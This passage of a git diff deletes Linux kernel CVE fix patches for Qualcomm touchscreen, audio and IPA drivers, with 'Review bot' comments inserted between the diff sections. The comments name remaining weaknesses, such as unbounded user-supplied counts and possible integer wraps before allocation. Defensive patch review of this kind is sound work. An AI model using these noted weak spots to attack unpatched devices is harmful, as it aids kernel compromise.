unsigned char *tmpbuf; - struct rmidev_data *dev_data = filp->private_data; - - if (IS_ERR(dev_data)) { -@@ -351,8 +356,14 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf, - if (count > (REG_ADDR_LIMIT - *f_pos)) - count = REG_ADDR_LIMIT - *f_pos; - -- if (copy_from_user(tmpbuf, buf, count)) -+ tmpbuf = kzalloc(count + 1, GFP_KERNEL); -+ if (!tmpbuf) -+ return -ENOMEM; -+ -+ if (copy_from_user(tmpbuf, buf, count)) { -+ kfree(tmpbuf); - return -EFAULT; -+ } - - mutex_lock(&(dev_data->file_mutex)); - -@@ -364,7 +375,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf, - *f_pos += retval; - - mutex_unlock(&(dev_data->file_mutex)); -- -+ kfree(tmpbuf); - return retval; - } - diff --git a/Patches/Linux_CVEs/CVE-2016-3865/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-3865/ANY/0002.patch deleted file mode 100644 index cd0e3117..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3865/ANY/0002.patch +++ /dev/null 
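Review bot: In rmidev_write() the new `kzalloc(count + 1, GFP_KERNEL)` followed by `copy_from_user()` and a manual `kfree()` on failure is the pattern `memdup_user()` exists for: `tmpbuf = memdup_user(buf, count); if (IS_ERR(tmpbuf)) return PTR_ERR(tmpbuf);`. That drops the zeroing of a buffer that is then overwritten and removes one error path that has to remember the free. The patch keeps the `+ 1` from the old variable-length array without saying what the extra byte is for; if nothing reads it, the allocation can be `count`. rmidev_read() should keep `kzalloc()`, since its buffer is presumably copied back to user space, and a one-line comment saying so would help. Both function bodies continue outside the hunks, and the synaptics_dsx patch that follows makes the identical change.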
@@ -1,86 +0,0 @@ -From 92242610894d1dc26759e486af1d11f2eb78c922 Mon Sep 17 00:00:00 2001 -From: Biswajit Paul -Date: Thu, 30 Jun 2016 19:00:50 -0700 -Subject: [PATCH] input: synaptics_dsx: allocate heap memory for temp buf - -rmidev file operations structure include write() and -read() which accepts data from user space. Temp -buffers are allocated through variable length arrays -which can pose security problems. So allocate memory -on heap instead of stack to avoid this. - -Bug: 28799389 -CRs-Fixed: 1032459 -Change-Id: I44443f91d435715dd0097ef8e8dfc48e291f93fc -Signed-off-by: Mohan Pallaka -Signed-off-by: Biswajit Paul ---- - .../touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c | 19 +++++++++++++++---- - 1 file changed, 15 insertions(+), 4 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c b/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c -index 4c341ffb60940..bb9ddd9873cb1 100644 ---- a/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c -+++ b/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_rmi_dev.c -@@ -347,7 +347,7 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf, - size_t count, loff_t *f_pos) - { - ssize_t retval; -- unsigned char tmpbuf[count + 1]; -+ unsigned char *tmpbuf; - struct rmidev_data *dev_data = filp->private_data; - - if (IS_ERR(dev_data)) { -@@ -361,6 +361,10 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf, - if (count > (REG_ADDR_LIMIT - *f_pos)) - count = REG_ADDR_LIMIT - *f_pos; - -+ tmpbuf = kzalloc(count + 1, GFP_KERNEL); -+ if (!tmpbuf) -+ return -ENOMEM; -+ - mutex_lock(&(dev_data->file_mutex)); - - retval = synaptics_rmi4_reg_read(rmidev->rmi4_data, -@@ -378,6 +382,7 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf, - clean_up: - mutex_unlock(&(dev_data->file_mutex)); - -+ kfree(tmpbuf); - return retval; - } - -@@ -393,7 +398,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf, - size_t 
count, loff_t *f_pos) - { - ssize_t retval; -- unsigned char tmpbuf[count + 1]; -+ unsigned char *tmpbuf; - struct rmidev_data *dev_data = filp->private_data; - - if (IS_ERR(dev_data)) { -@@ -407,8 +412,14 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf, - if (count > (REG_ADDR_LIMIT - *f_pos)) - count = REG_ADDR_LIMIT - *f_pos; - -- if (copy_from_user(tmpbuf, buf, count)) -+ tmpbuf = kzalloc(count + 1, GFP_KERNEL); -+ if (!tmpbuf) -+ return -ENOMEM; -+ -+ if (copy_from_user(tmpbuf, buf, count)) { -+ kfree(tmpbuf); - return -EFAULT; -+ } - - mutex_lock(&(dev_data->file_mutex)); - -@@ -420,7 +431,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf, - *f_pos += retval; - - mutex_unlock(&(dev_data->file_mutex)); -- -+ kfree(tmpbuf); - return retval; - } - diff --git a/Patches/Linux_CVEs/CVE-2016-3866/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3866/ANY/0001.patch deleted file mode 100644 index cedadb2a..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3866/ANY/0001.patch +++ /dev/null 
@@ -1,31 +0,0 @@
-From 5180cefe0eeb6f3e6e0c4967652facd20f07c20c Mon Sep 17 00:00:00 2001
-From: Surendar karka
-Date: Wed, 29 Jun 2016 14:23:25 +0530
-Subject: ASoC: msm: qdsp6v2: check param length for EAC3 format
-
-Initialize param length with user space argument and
-check the condition for maximum length in
-SND_AUDIOCODEC_EAC3 format.
-
-CRs-Fixed: 1032820
-Change-Id: I710c1f743d7502e93989e8cc487078366570e723
-Signed-off-by: Surendar karka
----
- sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-index f577637..26528e6 100644
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-@@ -1070,6 +1070,7 @@ static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream,
- __func__, ddp->params_length);
- return -EINVAL;
- }
-+ params_length = ddp->params_length*sizeof(int);
- if (params_length > MAX_AC3_PARAM_SIZE) {
- /*MAX is 36*sizeof(int) this should not happen*/
- pr_err("%s: params_length(%d) is greater than %zd\n",
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3867/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-3867/3.10/0001.patch
deleted file mode 100644
index 81970697..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3867/3.10/0001.patch
+++ /dev/null
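Review bot: The added `params_length = ddp->params_length*sizeof(int);` multiplies a user-supplied count before it is compared with `MAX_AC3_PARAM_SIZE`, so a large enough count could wrap or be truncated on assignment and still pass the comparison. Unless the check just above the hunk already bounds `ddp->params_length` (only its tail is visible), comparing the count itself avoids the multiplication: `if (ddp->params_length > MAX_AC3_PARAM_SIZE / sizeof(int)) return -EINVAL;`. `params_length` is printed with `%d` in the following `pr_err()`, which suggests a signed type; its declaration is outside the hunk.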
@@ -1,505 +0,0 @@ -From 816da3d19cfee937f5add485a112bb1cdfcb72c8 Mon Sep 17 00:00:00 2001 -From: Skylar Chang -Date: Fri, 8 Jul 2016 16:20:33 -0700 -Subject: msm: ipa: fix potential race condition ioctls - -There are numerous potential race condition -ioctls in the IPA driver. The fix is to add -check wherever it copies arguments from -user-space memory and process. - -Change-Id: I5a440f89153518507acdf5dad42625503732e59a -Signed-off-by: Skylar Chang ---- - drivers/platform/msm/ipa/ipa.c | 236 ++++++++++++++++++++++++++++++++++------- - 1 file changed, 196 insertions(+), 40 deletions(-) - -diff --git a/drivers/platform/msm/ipa/ipa.c b/drivers/platform/msm/ipa/ipa.c -index adce191..5cfbbc9 100644 ---- a/drivers/platform/msm/ipa/ipa.c -+++ b/drivers/platform/msm/ipa/ipa.c -@@ -390,6 +390,7 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - struct ipa_ioc_v4_nat_del nat_del; - struct ipa_ioc_rm_dependency rm_depend; - size_t sz; -+ int pre_entry; - - IPADBG("cmd=%x nr=%d\n", cmd, _IOC_NR(cmd)); - -@@ -438,11 +439,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -+ pre_entry = -+ ((struct ipa_ioc_nat_dma_cmd *)header)->entries; - pyld_sz = - sizeof(struct ipa_ioc_nat_dma_cmd) + -- ((struct ipa_ioc_nat_dma_cmd *)header)->entries * -- sizeof(struct ipa_ioc_nat_dma_one); -+ pre_entry * sizeof(struct ipa_ioc_nat_dma_one); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -453,7 +454,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_nat_dma_cmd *)param)->entries -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_nat_dma_cmd *)param)->entries, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_nat_dma_cmd((struct ipa_ioc_nat_dma_cmd *)param)) { - retval = 
-EFAULT; - break; -@@ -478,10 +487,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_hdr *)header)->num_hdrs; - pyld_sz = - sizeof(struct ipa_ioc_add_hdr) + -- ((struct ipa_ioc_add_hdr *)header)->num_hdrs * -- sizeof(struct ipa_hdr_add); -+ pre_entry * sizeof(struct ipa_hdr_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -491,6 +501,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_hdr *)param)->num_hdrs -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_add_hdr *)param)->num_hdrs, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_add_hdr((struct ipa_ioc_add_hdr *)param)) { - retval = -EFAULT; - break; -@@ -507,10 +526,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_hdr *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_hdr) + -- ((struct ipa_ioc_del_hdr *)header)->num_hdls * -- sizeof(struct ipa_hdr_del); -+ pre_entry * sizeof(struct ipa_hdr_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -520,6 +540,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_hdr *)param)->num_hdls -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_del_hdr *)param)->num_hdls, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_del_hdr((struct ipa_ioc_del_hdr *)param)) { - retval = -EFAULT; - break; -@@ -536,10 +565,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; 
- break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_rt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_add_rt_rule) + -- ((struct ipa_ioc_add_rt_rule *)header)->num_rules * -- sizeof(struct ipa_rt_rule_add); -+ pre_entry * sizeof(struct ipa_rt_rule_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -549,6 +579,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_rt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_add_rt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_add_rt_rule((struct ipa_ioc_add_rt_rule *)param)) { - retval = -EFAULT; - break; -@@ -565,10 +605,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_mdfy_rt_rule) + -- ((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules * -- sizeof(struct ipa_rt_rule_mdfy); -+ pre_entry * sizeof(struct ipa_rt_rule_mdfy); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -578,6 +619,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_mdfy_rt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_mdfy_rt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_mdfy_rt_rule((struct ipa_ioc_mdfy_rt_rule *)param)) { - retval = -EFAULT; - break; -@@ -594,10 +645,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct 
ipa_ioc_del_rt_rule *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_rt_rule) + -- ((struct ipa_ioc_del_rt_rule *)header)->num_hdls * -- sizeof(struct ipa_rt_rule_del); -+ pre_entry * sizeof(struct ipa_rt_rule_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -607,6 +659,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_rt_rule *)param)->num_hdls -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_del_rt_rule *)param)->num_hdls, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_del_rt_rule((struct ipa_ioc_del_rt_rule *)param)) { - retval = -EFAULT; - break; -@@ -623,10 +684,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_flt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_add_flt_rule) + -- ((struct ipa_ioc_add_flt_rule *)header)->num_rules * -- sizeof(struct ipa_flt_rule_add); -+ pre_entry * sizeof(struct ipa_flt_rule_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -636,6 +698,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_flt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_add_flt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_add_flt_rule((struct ipa_ioc_add_flt_rule *)param)) { - retval = -EFAULT; - break; -@@ -652,10 +724,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_flt_rule *)header)->num_hdls; - 
pyld_sz = - sizeof(struct ipa_ioc_del_flt_rule) + -- ((struct ipa_ioc_del_flt_rule *)header)->num_hdls * -- sizeof(struct ipa_flt_rule_del); -+ pre_entry * sizeof(struct ipa_flt_rule_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -665,6 +738,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_flt_rule *)param)->num_hdls -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_del_flt_rule *)param)-> -+ num_hdls, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_del_flt_rule((struct ipa_ioc_del_flt_rule *)param)) { - retval = -EFAULT; - break; -@@ -681,10 +764,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_mdfy_flt_rule) + -- ((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules * -- sizeof(struct ipa_flt_rule_mdfy); -+ pre_entry * sizeof(struct ipa_flt_rule_mdfy); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -694,6 +778,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_mdfy_flt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_mdfy_flt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_mdfy_flt_rule((struct ipa_ioc_mdfy_flt_rule *)param)) { - retval = -EFAULT; - break; -@@ -801,15 +895,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -- if (((struct ipa_ioc_query_intf_tx_props *)header)->num_tx_props -- > IPA_NUM_PROPS_MAX) { -+ 
if (((struct ipa_ioc_query_intf_tx_props *) -+ header)->num_tx_props > IPA_NUM_PROPS_MAX) { - retval = -EFAULT; - break; - } -- -- pyld_sz = sz + ((struct ipa_ioc_query_intf_tx_props *) -- header)->num_tx_props * -+ pre_entry = -+ ((struct ipa_ioc_query_intf_tx_props *) -+ header)->num_tx_props; -+ pyld_sz = sz + pre_entry * - sizeof(struct ipa_ioc_tx_intf_prop); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { -@@ -820,6 +914,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_query_intf_tx_props *) -+ param)->num_tx_props -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_query_intf_tx_props *) -+ param)->num_tx_props, pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_query_intf_tx_props( - (struct ipa_ioc_query_intf_tx_props *)param)) { - retval = -1; -@@ -836,15 +940,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -- if (((struct ipa_ioc_query_intf_rx_props *)header)->num_rx_props -- > IPA_NUM_PROPS_MAX) { -+ if (((struct ipa_ioc_query_intf_rx_props *) -+ header)->num_rx_props > IPA_NUM_PROPS_MAX) { - retval = -EFAULT; - break; - } -- -- pyld_sz = sz + ((struct ipa_ioc_query_intf_rx_props *) -- header)->num_rx_props * -+ pre_entry = -+ ((struct ipa_ioc_query_intf_rx_props *) -+ header)->num_rx_props; -+ pyld_sz = sz + pre_entry * - sizeof(struct ipa_ioc_rx_intf_prop); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { -@@ -855,6 +959,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_query_intf_rx_props *) -+ param)->num_rx_props != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_query_intf_rx_props *) -+ 
param)->num_rx_props, pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_query_intf_rx_props( - (struct ipa_ioc_query_intf_rx_props *)param)) { - retval = -1; -@@ -877,9 +990,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -- pyld_sz = sz + ((struct ipa_ioc_query_intf_ext_props *) -- header)->num_ext_props * -+ pre_entry = -+ ((struct ipa_ioc_query_intf_ext_props *) -+ header)->num_ext_props; -+ pyld_sz = sz + pre_entry * - sizeof(struct ipa_ioc_ext_intf_prop); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { -@@ -890,6 +1004,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_query_intf_ext_props *) -+ param)->num_ext_props != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_query_intf_ext_props *) -+ param)->num_ext_props, pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_query_intf_ext_props( - (struct ipa_ioc_query_intf_ext_props *)param)) { - retval = -1; -@@ -906,8 +1029,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_msg_meta *)header)->msg_len; - pyld_sz = sizeof(struct ipa_msg_meta) + -- ((struct ipa_msg_meta *)header)->msg_len; -+ pre_entry; - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -917,6 +1042,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_msg_meta *)param)->msg_len -+ != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_msg_meta *)param)->msg_len, -+ pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_pull_msg((struct ipa_msg_meta *)param, - (char *)param + sizeof(struct 
ipa_msg_meta), - ((struct ipa_msg_meta *)param)->msg_len) != -@@ -1032,10 +1166,12 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_hdr_proc_ctx *) -+ header)->num_proc_ctxs; - pyld_sz = - sizeof(struct ipa_ioc_add_hdr_proc_ctx) + -- ((struct ipa_ioc_add_hdr_proc_ctx *)header)->num_proc_ctxs * -- sizeof(struct ipa_hdr_proc_ctx_add); -+ pre_entry * sizeof(struct ipa_hdr_proc_ctx_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -1045,6 +1181,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_hdr_proc_ctx *) -+ param)->num_proc_ctxs != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_add_hdr_proc_ctx *) -+ param)->num_proc_ctxs, pre_entry); -+ retval = -EFAULT; -+ break; -+ } - if (ipa_add_hdr_proc_ctx( - (struct ipa_ioc_add_hdr_proc_ctx *)param)) { - retval = -EFAULT; -@@ -1061,10 +1206,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_hdr_proc_ctx) + -- ((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls * -- sizeof(struct ipa_hdr_proc_ctx_del); -+ pre_entry * sizeof(struct ipa_hdr_proc_ctx_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -1074,6 +1220,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_hdr_proc_ctx *) -+ param)->num_hdls != pre_entry)) { -+ IPAERR("current %d pre %d\n", -+ ((struct ipa_ioc_del_hdr_proc_ctx *)param)-> -+ num_hdls, -+ pre_entry); -+ retval = -EFAULT; 
-+ break; -+ } - if (ipa_del_hdr_proc_ctx( - (struct ipa_ioc_del_hdr_proc_ctx *)param)) { - retval = -EFAULT; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3867/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-3867/3.18/0002.patch deleted file mode 100644 index 3d1fa1a4..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3867/3.18/0002.patch +++ /dev/null 
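Review bot: The re-check after the second `copy_from_user()` closes the double fetch, but `pre_entry` itself is not bounded in most cases, so `pyld_sz = sizeof(...) + pre_entry * sizeof(...)` is still sized by an unchecked user value. Only the `num_tx_props` and `num_rx_props` cases visibly compare against `IPA_NUM_PROPS_MAX`; the others, including `msg_len`, go straight to `kzalloc(pyld_sz, GFP_KERNEL)`. `pre_entry` is declared `int`, and if the count fields are wider or unsigned (their declarations are not in the patch) the product can wrap or go negative before the allocation, so a per-command upper bound ahead of computing `pyld_sz` is worth adding. The same check is repeated in every case and would be easier to audit as one helper. The 3.18 version of this patch that follows returns `-EINVAL` from the check where this one returns `-EFAULT`.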
@@ -1,1026 +0,0 @@ -From b518b33d4b7da7df5a0348a97ffb4f35be819937 Mon Sep 17 00:00:00 2001 -From: Skylar Chang -Date: Fri, 8 Jul 2016 16:20:33 -0700 -Subject: msm: ipa: fix potential race condition ioctls - -There are potential race condition ioctls in -the IPA driver when it copies the actual -arguments from the user-space memory to the -IPA-driver. The fix is to add check on the 2nd -copy to make sure the same payload size is copied -to the pre-allocated kernel memory as in during -the 1st copy. - -Change-Id: I5a440f89153518507acdf5dad42625503732e59a -Signed-off-by: Skylar Chang ---- - drivers/platform/msm/ipa/ipa_v2/ipa.c | 226 +++++++++++++++++++++++++----- - drivers/platform/msm/ipa/ipa_v3/ipa.c | 257 +++++++++++++++++++++++++++++----- - 2 files changed, 411 insertions(+), 72 deletions(-) - -diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa.c b/drivers/platform/msm/ipa/ipa_v2/ipa.c -index 07b934f..72c9e8e 100644 ---- a/drivers/platform/msm/ipa/ipa_v2/ipa.c -+++ b/drivers/platform/msm/ipa/ipa_v2/ipa.c -@@ -575,6 +575,7 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - struct ipa_ioc_v4_nat_del nat_del; - struct ipa_ioc_rm_dependency rm_depend; - size_t sz; -+ int pre_entry; - - IPADBG("cmd=%x nr=%d\n", cmd, _IOC_NR(cmd)); - -@@ -623,11 +624,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -+ pre_entry = -+ ((struct ipa_ioc_nat_dma_cmd *)header)->entries; - pyld_sz = - sizeof(struct ipa_ioc_nat_dma_cmd) + -- ((struct ipa_ioc_nat_dma_cmd *)header)->entries * -- sizeof(struct ipa_ioc_nat_dma_one); -+ pre_entry * sizeof(struct ipa_ioc_nat_dma_one); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -638,7 +639,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_nat_dma_cmd 
*)param)->entries -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_nat_dma_cmd *)param)->entries, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_nat_dma_cmd((struct ipa_ioc_nat_dma_cmd *)param)) { - retval = -EFAULT; - break; -@@ -663,10 +672,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_hdr *)header)->num_hdrs; - pyld_sz = - sizeof(struct ipa_ioc_add_hdr) + -- ((struct ipa_ioc_add_hdr *)header)->num_hdrs * -- sizeof(struct ipa_hdr_add); -+ pre_entry * sizeof(struct ipa_hdr_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -676,6 +686,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_hdr *)param)->num_hdrs -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_hdr *)param)->num_hdrs, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_add_hdr((struct ipa_ioc_add_hdr *)param)) { - retval = -EFAULT; - break; -@@ -692,10 +711,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_hdr *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_hdr) + -- ((struct 